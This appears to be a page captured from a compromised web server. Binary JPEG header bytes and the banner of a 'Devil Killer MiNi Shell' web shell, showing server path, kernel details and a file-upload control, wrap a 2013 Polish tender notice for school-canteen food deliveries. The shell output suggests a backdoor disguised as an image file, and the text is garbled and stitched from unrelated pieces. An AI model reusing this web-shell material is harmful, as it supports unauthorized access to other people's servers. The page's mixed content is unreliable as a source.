JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131120/475142-N-2013.html

<p class="kh_header"><b>Wadowice Górne: Sprzedaż i dostawa artykułów żywnościowych do stołówki szkolnej w Publicznym Gimnazjum w Wadowicach Górnych.</b><br>
<b>Numer ogłoszenia: 475142 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum w Wadowicach Górnych , Wadowice Górne 133 E, 39-308 Wadowice Górne, woj. podkarpackie, tel. 14 666 10 20, faks 14 666 10 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgwg.net76.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Oświata.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostawa artykułów żywnościowych do stołówki szkolnej w Publicznym Gimnazjum w Wadowicach Górnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Produkty zwierzęce, mięso i produkty mięsne, kod CPV 15100000-9

II.	Świeży drób, kod CPV 15112100-7

III.	Ryby przetworzone i konserwowane, kod CPV 15200000-0; 
     Produkty głęboko mrożone, kod CPV 15896000-5;
     Warzywa mrożone, kod CPV 15331170-9
     Wyroby gotowe garmażeryjne, kod CPV 15894300-4

IV.	Warzywa i owoce, kod CPV 03220000-9; 
Owoce tropikalne, kod CPV 03222110-7
Ze względu na zamawianie niektórych towarów w sztukach oraz ceny za 1 sztukę do obliczenia ceny będzie się przyjmować, że waga wynosi nie mniej niż:
1.	Kapusta włoska 1 szt. - 2 kg
2.	Kapusta czerwona 1 szt. - 2 kg
3.	Kapusta pekińska 1 szt. - 1,5 kg a w okresie maj czerwiec 1kg
4.	Por 1 szt. - 0,25 kg
5.	Rzodkiewka 1 pęczek - 0,15 kg
6.	Sałata zielona 1 szt. - 0,20 kg
7.	Sałata lodowa 1 szt. - 0,40 kg
8.	Koper zielony 1 wiązka - 0,10 kg
9.	Natka pietruszki 1 wiązka - 0,10 kg
10.	Szczypiorek 1 wiązka - 0,10 kg
11.	Kalafior świeży 1 szt. - 1,2 kg
12.	Brokuł świeży 1 szt. - 1,0 kg


Również towar zamawiany w kilogramach musi spełniać wymogi jak dla I gatunku wyrobu.
V.	Jaja kurze konsumpcyjne świeże klasa A, kod CPV 03142500-3

VI.	Produkty mleczarskie, kod CPV 15500000-3 

VII.	Pieczywo, świeże wyroby piekarskie i ciastkarskie, kod CPV 15810000-9

VIII.	Produkty przemiału ziarna, skrobi i produktów skrobiowych, kod CPV   
 15600000-4; 
Produkty mączne, kod CPV 15851000-8

IX.	Różne produkty spożywcze, kod CPV 15800000-6
Oleje, tłuszcze roślinne, kod CPV 15400000-2
Przetworzone owoce, kod CPV 15332100-5
Produkty cukrownicze, kod CPV 15833000-6

X.	 Soki skoncentrowane, kod CPV 15321800-2

Opisy poszczególnych grup, ilość, opis i wyszczególnienie przedmiotu zamówienia podano w Załączniku nr 5 do specyfikacji. Wielkości podane w Załączniku Nr 5 są wielkościami szacunkowymi (przewidywanymi) obejmującymi okres 10 miesięcy (od stycznia do czerwca oraz od września do grudnia). 
W wyliczeniach podanych w tabelach Zamawiający opierał się na ilościach zużytych 
w latach poprzednich. Zamawiający zastrzega sobie możliwość zmiany podanych wielkości 
z przyczyn od niego niezależnych np.: zmiana ilości dożywianych dzieci oraz dodatkowe dni wolne itp. 
Nazwy własne, użyte w SIWZ, nie mają na celu naruszenia art. 29 i art. 7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Załączniki nr 5 stanowiące integralną część SIWZ i wszystkie wskazane w nich z nazwy produkty, (wyroby) spożywcze należy rozumieć jako określenie wymaganych parametrów asortymentowych, zdrowotnych 
i jakościowych, również w zakresie wielkości opakowań dotyczących każdej części zamówienia. Oznacza to, że zgodnie z art. 29 Ustawy, na wskazane z nazwy produkty spożywcze, Zamawiający dopuszcza zastosowanie równoważnych produktów spożywczych, nie gorszej jakości niż opisane w załączniku nr 5. Ciężar udowodnienia, że  produkty spożywcze są równoważne w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty dopuszczające dany produkt spożywczy do spożycia, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne.
Przez ofertę równoważną Zamawiający rozumie:
   	Gramatura oferowanego produktu równoważnego nie może być niższa niż gramatura produktu wskazanego w formularzu. Zaoferowane produkty równoważne muszą posiadać te same walory organoleptyczne (smak, zapach, barwa, estetyka, konsystencja) oraz zawierać 
w swoim składzie te same surowce użyte do produkcji, co produkt określony przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.21.00-7, 15.20.00.00-0, 15.89.60.00-5, 15.33.11.70-9, 15.89.43.00-4, 03.22.00.00-9, 03.22.21.10-7, 03.14.25.00-3, 15.50.00.00-3, 15.81.00.00-9, 15.60.00.00-4, 15.85.10.00-8, 15.80.00.00-6, 15.40.00.00-2, 15.33.21.00-5, 15.83.30.00-6, 15.32.18.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli prowadzi działalność gospodarczą w zakresie objętym niniejszym zamówieniem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie, do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować właściwym środkiem transportu do dostawy artykułów spożywczych danej kategorii oraz posiadać wdrożony system HACCP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie, do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wg wzoru stanowiącego załącznik Nr 1 do SIWZ, (Składający ofertę częściową wypełnia oddzielnie Formularz oferty na każdą grupę towarów żywnościowych).

2. Wypełniony wykaz zamawianych towarów wg załącznika nr 5 (Składający ofertę musi wypełnić wszystkie pozycje z załącznika nr 5 na daną grupę towarów żywnościowych).

3. Oświadczenie, że Wykonawca spełnia wymogi art. 22 ust.1 pkt. 1-3 wg wzoru stanowiącego załącznik Nr 2 do SIWZ.

4. Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych wg wzoru stanowiącego załącznik Nr 3 do SIWZ.

5. Aktualny dokument dopuszczający Wykonawcę do obrotu prawnego w zakresie objętym zamówieniem tj. odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 
m-cy przed upływem terminu składania ofert.

6. Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.

7. Oświadczenie, że Wykonawca zapoznał się z warunkami przetargu określonymi w niniejszej specyfikacji i przyjmuje je bez zastrzeżeń (pkt 1 w Formularzu oferty).

8. Oświadczenie, że Wykonawca pozostaje związany ze złożoną przez siebie ofertą przez okres 30 dni (pkt 2 w Formularzu oferty).

9. Projekt umowy - wg załącznika nr 4 - powinien być zaakceptowany przez osobę lub osoby upoważnione do reprezentowania podmiotu składającego ofertę (pkt 3 w Formularzu oferty). Projekt umowy dodatkowo powinien być parafowany.

10. Oświadczenie o spełnieniu warunków, o których mowa w art. 44 ustawy Prawo zamówień publicznych wg wzoru stanowiącego załącznik nr 6 do SIWZ.

11. Oświadczenie, informacja o podwykonawcach wg wzoru stanowiącego załącznik nr 7 do SIWZ.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty z dopiskiem (za zgodność z oryginałem).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadku wystąpienia następujących okoliczności:
a) zamawiający zastrzega sobie możliwość wprowadzania zmian do umowy 
w zakresie zmniejszania ilości i wartości dostaw w sytuacjach, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia (np. zmniejszenie stanów żywionych). Zamawiający nie będą ponosili ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie;
b) w przypadku zmian przepisów dotyczących żywienia młodzieży lub innych ważnych czynników (np. decyzja Powiatowej Stacji Sanitarno-Epidemiologicznej) Zamawiający zastrzega sobie wynikające z tego zmiany asortymentu towaru.
c) w przypadku ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy, strony dopuszczają możliwość zmiany stawek podatkowych zgodnie z obowiązującymi przepisami;
d) zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy;
e) zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy;
f) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy;
g) do umowy wprowadza się klauzule: 
* Wykonawca może realizować dostawy wyszczególnione w załączniku nr 5 
w cenach jednostkowych niższych lub promocyjnych niż podane w załączniku nr 5 pod warunkiem zachowania asortymentu i nie niższych parametrów, cech jakościowych: składu, smaku, zapachu, wyglądu, przydatności do spożycia, nie mniejszej gramatury produktu, na co Zamawiający wyraża zgodę, z zastrzeżeniem, że zmiana jest korzystna dla szkoły. 

* W uzasadnionych przypadkach za zgodą przedstawiciela Zamawiającego dopuszcza się dostarczenia mniejszej/większej gramatury produktu po cenie proporcjonalnie niższej/wyższej do ceny jednostkowej podanej w załączniku nr 5. 

* Sposób wykonania przedmiotu zamówienia lub termin dostarczenia towaru może ulec zmianie w przypadku zaistnienia przyczyn nie leżących po stronie Wykonawcy lub Zamawiającego, np. udokumentowanego ogólnego braku na rynku jakiegoś asortymentu produktów spożywczych lub wielkości opakowań, Wykonawca może po uzgodnieniu i uzyskaniu aprobaty przez osobę prowadzącą zapotrzebowania dla stołówki szkolnej dokumentując zaistniałą przyczynę, dostarczyć produkt podobny, równoważny lub w innej wielkości opakowania, w cenie podanej w formularzu cenowym po przeliczeniu na aktualną wielkość opakowania lub towaru z zastrzeżeniem, że termin dostarczenia towaru nie może być dłuższy niż 3 dni. O zaistniałym fakcie Wykonawca zobowiązany jest w następnym dniu po otrzymaniu zapotrzebowania na towar, pisemnie powiadomić upoważnionego pracownika szkoły do przekazywania zamówień Wykonawcy, pod rygorem zastosowania kar umownych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgwg.net76.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum w Wadowicach Górnych, 
39-308 Wadowice Górne 133E..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2013 godzina 10:00, miejsce: Publiczne Gimnazjum w Wadowicach Górnych, 
39-308 Wadowice Górne 133E
pokój nr 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PRODUKTY ZWIERZĘCE, MIĘSO I PRODUKTY MIĘSNE PRZETWORZONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab bez kości kg 140; Karkówka bez kości kg 300; Łopatka bez kości kg 530; Szynka wieprzowa bez kości kg 140; Biodrówka bez kości kg 700; Mięso sznyclowe kg 730; Mortadela kg 25; Parówki z cielęciną kg 35; Kiełbasa toruńska kg 600; Kiełbasa swojska kg 220; Kiełbasa parówkowa kg 12; Kiełbasa śląska kg 15; Boczek kg 80; Smalec wyborowy 200g szt. 305; Słonina kg 80; Udziec wołowy kg 140.
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część I.
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ŚWIEŻY DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Korpus z kurczaka (porcja rosołowa) kg 305; Ćwiartka z kurczaka kg 1500; Filet z kurczaka kg 100; Podudzie z kurczaka kg 80; Udziec z kurczaka kg 520; Kurczak (sztuka min. 1,5kg) kg 300; Filet z indyka kg 210.
 Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część II. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE; PRODUKTY GŁĘBOKO MROŻONE; WARZYWA MROŻONE; WYROBY GOTOWE GARMAŻERYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dorsz kg 10; Morszczuk kg 10; Mintaj kostka panierowana kg 1190; Paluszki rybne kg 30; Figurki rybne kg 20; Barszcz ukraiński 450g szt. 55; Barszcz ukraiński kg 60; Mieszanka 7 składników 450g szt. 40; Mieszanka 7 składników kg 40; Mieszanka europejska kg 65; Bukiet kwiatowy warzyw kg 45; Bukiet jarzyn 450g szt. 30; Kalafior 400g szt. 40; Kalafior kg 65; Brokuły 400g szt. 25; Brokuły kg 80; Marchew z groszkiem 450g szt. 25; Marchew z groszkiem kg 60; Groszek zielony 450g szt. 20;Brukselka 450g szt. 20; Kotlet drobiowy w panierce kg 1050; Kartacze z mięsem kg 300.
 Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część III. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.89.60.00-5, 15.33.11.70-9, 15.89.43.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA I OWOCE; OWOCE TROPIKALNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew kg 1525; Pietruszka kg 290; Seler kg 440; Cebula kg 470; Ziemniaki kg 8980; Ziemniaki młode kg 430;Buraki ćwikłowe kg 20;  Kapusta biała kg 120;  Kapusta pekińska szt. 345; Kapusta czerwona szt. 20; Kapusta włoska szt. 10; Kapusta kwaszona kg 850;Sałata lodowa szt. 10; Sałata zielona szt. 10; Ogórek kwaszony 400g szt. 540; Fasola biała Jaś średnia kg 185; Fasola biała drobna kg 60; Soczewica zielona/czerwona 350g szt. 15; Por szt. 130; Pieczarka kg 40; Papryka czerwona kg 9; Pomidor kg 245; Ogórek zielony kg 110; Rzodkiewka szt. 10; Brokuł szt. 20; Kalafior szt. 20; Koper zielony szt. 70; Pietruszka natka szt. 150;  Czosnek kg 3; Jabłka kg 650; Mandarynka/klementynka kg 250; Banan kg 740; Kiwi kg 160; Brzoskwinia/Nektarynka kg 200; Gruszka kg 30; Śliwki kg 10;  Truskawki kg 10; Cytryna kg 8.
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część IV. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> JAJA KURZE KONSUMPCYJNE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze konsumpcyjne świeże klasa A szt. 7250.
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część V. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18% 400g szt. 2070; Masło extra 200g zaw. tłuszczu min 82% szt. 1280; Mleko w woreczkach 1l szt. 87; Twaróg półtłusty 250g szt. 1380; Jogurt naturalny 180 ml szt. 56, Jogurt naturalny 400g szt. 40;  Majonez 835g szt. 60.
 Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część VI. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PIECZYWO; ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenno-żytni 0,60 kg, krojony szt. 3990; Chleb graham z ziarnami 0,5kg, krojony szt. 1300; Bułka zwykła szt. 620; Pączek szt. 100; Drożdżówka szt. 100.
